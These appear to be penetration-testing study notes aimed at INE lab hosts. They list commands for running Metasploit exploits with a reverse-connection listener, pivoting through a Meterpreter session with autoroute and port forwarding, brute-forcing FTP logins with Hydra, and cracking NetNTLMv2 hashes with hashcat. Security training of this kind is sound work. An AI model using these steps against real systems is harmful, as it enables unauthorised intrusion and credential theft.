Most used tools

Identify and modify exploits

Tools: msfconsole, searchsploit

Usage:

  1. Search for an exploit:

msfconsole -q
search proftpd

  2. Select an exploit:

use exploit/...

  3. Modify the exploit's options:

show options
set RHOSTS demo.ine.local
set LHOST 192.0.0.1
set LPORT 6789

  4. Run the exploit:

run

Demonstrate pivoting by adding a route and port forwarding

Tools: autoroute, portfwd

Context: These steps require that we already have a Meterpreter session.

Usage:

  1. Identify our IP in the subnet:

ipconfig

  2. Run autoroute. If our IP is 10.0.19.197...

run autoroute -s 10.0.19.0/20

  3. Scan for new hosts:

background
use auxiliary/scanner/portscan/tcp
set RHOSTS demo2.ine.local
set PORTS 1-100
exploit

  4. Pivot by port forwarding:

sessions -i <session ID>
portfwd add -l 1234 -p 80 -r <demo2.ine.local IP>
portfwd list

  5. On our local machine, run:

nmap -sCV -sS -p 1234 localhost

Conduct brute-force password attacks

Tools: Hydra, msfconsole

Usage:

hydra -L /usr/share/metasploit-framework/data/wordlists/unix_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt demo.ine.local ftp

Conduct hash cracking

Tools: hashcat, john

Usage:

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
